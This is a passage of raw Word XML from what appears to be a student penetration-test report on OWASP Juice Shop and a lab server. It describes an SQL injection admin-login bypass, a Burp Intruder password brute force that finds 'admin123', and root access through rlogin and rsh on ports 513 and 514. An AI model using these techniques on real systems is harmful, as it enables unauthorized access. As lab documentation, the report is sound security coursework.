          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D8582F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Payload modification</w:t>
      </w:r>
      <w:r w:rsidR="00681A4E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0732AA4A" w14:textId="1E737E42" w:rsidR="00610989" w:rsidRPr="00FA5B3B" w:rsidRDefault="00610989" w:rsidP="00610989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</w:t>
      </w:r>
      <w:r w:rsidR="00F96D90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Admin access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F4DB7" w14:textId="1F5E3003" w:rsidR="00B56664" w:rsidRPr="00FA5B3B" w:rsidRDefault="00610989" w:rsidP="00151C2F">
      <w:pPr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B2885BC" wp14:editId="6ADFD0EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>583565</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>697865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4580017" cy="708721"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1779016833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16833" name="Picture 8" descr="A black screen with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802" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>It seems</w:t>
      </w:r>
      <w:r w:rsidR="00B5572D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> like the website doesn’t have </w:t>
      </w:r>
      <w:r w:rsidR="002E2747" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>server-side</w:t>
      </w:r>
      <w:r w:rsidR="00B5572D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A3498A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r w:rsidR="009A56D3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cleansing;</w:t>
      </w:r>
      <w:r w:rsidR="00C45FB0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hence this type of attack is possible. </w:t>
      </w:r>
      <w:r w:rsidR="009B606B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>In this scenario, the validation code m</w:t>
      </w:r>
      <w:r w:rsidR="00B11046" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ight be like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272DE9CC" w14:textId="7BF536DC" w:rsidR="00151C2F" w:rsidRPr="00FA5B3B" w:rsidRDefault="00151C2F" w:rsidP="00151C2F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2</w:t>
      </w:r>
      <w:r w:rsidR="00F96D90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00610989" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL code</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A7982" w14:textId="3B505CEB" w:rsidR="00B11046" w:rsidRPr="00FA5B3B" w:rsidRDefault="00610989" w:rsidP="00B11046">
      <w:pPr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B7DE6C0" wp14:editId="1C7C66AC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5425440" cy="670560"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="7049716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71641" name="Picture 7049716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7CF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="009814A6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection</w:t>
      </w:r>
      <w:r w:rsidR="000937CF" w:rsidRPr="00FA5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488E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>admin.juice</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001E488E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-sh.op</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E488E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00F75AA7" w:rsidRPr="00FA5B3B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r w:rsidR="00F75AA7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> meant to </w:t>
      </w:r>
      <w:r w:rsidR="009814A6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E315C7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>login to the admin account without the need for a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C17E41D" w14:textId="743F1844" w:rsidR="00674CC8" w:rsidRPr="00FA5B3B" w:rsidRDefault="00674CC8" w:rsidP="00674CC8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2</w:t>
      </w:r>
      <w:r w:rsidR="00F96D90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00610989" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection </w:t>
      </w:r>
      <w:r w:rsidR="00C85773" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>illustration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00810D28" w14:textId="1C511E3F" w:rsidR="006A4EE7" w:rsidRPr="00FA5B3B" w:rsidRDefault="006A4EE7" w:rsidP="009C24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lastRenderedPageBreak/>
        <w:t>Brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B2370" w14:textId="213AEAAD" w:rsidR="0051173B" w:rsidRPr="00FA5B3B" w:rsidRDefault="005E7677" w:rsidP="00CF0DF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28910BCF" wp14:editId="1687329F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-198120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2593340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6141720" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20444144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14436" name="Picture 204441443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r="17957" b="34375"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6141720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F1" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77180DA6" wp14:editId="41CD74E0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5992495" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="2942298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29879" name="Picture 29422987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9"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="599249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3C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="000B4073" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidR="00D0296B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3E38A2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">craft </w:t>
      </w:r>
      <w:r w:rsidR="007359BD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a brute force</w:t>
      </w:r>
      <w:r w:rsidR="004D189C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> position</w:t>
      </w:r>
      <w:r w:rsidR="007359BD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> with sniper </w:t>
      </w:r>
      <w:r w:rsidR="005E77E9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>attack type in Burp Suite Intruder.</w:t>
      </w:r>
      <w:r w:rsidR="004D189C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The payload is </w:t>
      </w:r>
      <w:r w:rsidR="00763354" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">best1050.txt from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763354" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sec</w:t>
      </w:r>
      <w:r w:rsidR="00A54FA2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00763354" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763354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A54FA2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">common </w:t>
      </w:r>
      <w:r w:rsidR="00C85773" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r w:rsidR="00A54FA2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B47CE6" w14:textId="23A51922" w:rsidR="00A54FA2" w:rsidRPr="00FA5B3B" w:rsidRDefault="00A54FA2" w:rsidP="00A54FA2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2</w:t>
      </w:r>
      <w:r w:rsidR="00F96D90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E00644" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite Intruder</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301C29DD" w14:textId="17010A07" w:rsidR="00BA35E0" w:rsidRPr="00FA5B3B" w:rsidRDefault="00BA35E0" w:rsidP="00BA35E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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="084E2343" wp14:editId="1DEA75BA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288738" cy="1028789"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="7326474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4741" name="Picture 16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FA2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The attacker</w:t>
      </w:r>
      <w:r w:rsidR="007D5D96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E00644" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>starts</w:t>
      </w:r>
      <w:r w:rsidR="007D5D96" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attack then wait for successful response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266AEBF3" w14:textId="20786189" w:rsidR="005E77E9" w:rsidRPr="00FA5B3B" w:rsidRDefault="007D5D96" w:rsidP="007D5D96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2</w:t>
      </w:r>
      <w:r w:rsidR="00F96D90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E00644" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Brute Force result</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0698A2" w14:textId="2263195B" w:rsidR="00866705" w:rsidRPr="00FA5B3B" w:rsidRDefault="00E00644" w:rsidP="0086670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The password </w:t>
      </w:r>
      <w:r w:rsidR="005A3380" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>was unsecured, the attacker can now login with “admin123”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D84B5" w14:textId="44698B0F" w:rsidR="001E3DFE" w:rsidRPr="00FA5B3B" w:rsidRDefault="00866705" w:rsidP="006B662E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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3.Server exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6731CCE7" w14:textId="57532BA5" w:rsidR="00866705" w:rsidRPr="00FA5B3B" w:rsidRDefault="00C4212A" w:rsidP="00DB37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>Exploiting port</w:t>
      </w:r>
      <w:r w:rsidR="00395A13" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 513</w:t>
      </w:r>
      <w:r w:rsidR="00395A13" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,514: r-Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F86B47" w14:textId="0AD5CFA4" w:rsidR="00D52F46" w:rsidRPr="00FA5B3B" w:rsidRDefault="00255CFE" w:rsidP="0047037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>From phase 2,</w:t>
      </w:r>
      <w:r w:rsidR="00484F15" w:rsidRPr="00FA5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F15" w:rsidRPr="00FA5B3B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="00484F15" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> showed that r-Services ports 513, 514 is open</w:t>
      </w:r>
      <w:r w:rsidR="00917A90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, which the hacker can exploit to gain root access</w:t>
      </w:r>
      <w:r w:rsidR="007121E9" w:rsidRPr="00FA5B3B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="007121E9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007121E9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-client</w:t>
      </w:r>
      <w:r w:rsidR="00917A90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2F2D3D" w14:textId="55C55422" w:rsidR="00470378" w:rsidRPr="00FA5B3B" w:rsidRDefault="00456F52" w:rsidP="0047037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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C508074" wp14:editId="5BE46636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4884420" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="2064417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1751" name="Picture 2064417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3C4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Using rlogin command will connect to port </w:t>
      </w:r>
      <w:r w:rsidR="00944DE7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">513 and gives root access, same for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00944DE7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00944DE7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> but in port 514.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF32837" w14:textId="0AD8997B" w:rsidR="00395A13" w:rsidRPr="00FA5B3B" w:rsidRDefault="00456F52" w:rsidP="00F03817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2</w:t>
      </w:r>
      <w:r w:rsidR="00F96D90" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F03817" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Port 513 exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD8A110" w14:textId="37DDF8C8" w:rsidR="005D094E" w:rsidRPr="00FA5B3B" w:rsidRDefault="005D094E" w:rsidP="005D094E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B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6A6D30F" wp14:editId="0E815C29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922520" cy="1958340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="3339458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5859" name="Picture 33394585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B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Fig.25 Port 514 exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDBBEBF" w14:textId="07632FC0" w:rsidR="006B662E" w:rsidRPr="00FA5B3B" w:rsidRDefault="00CB46DC" w:rsidP="00CB46DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
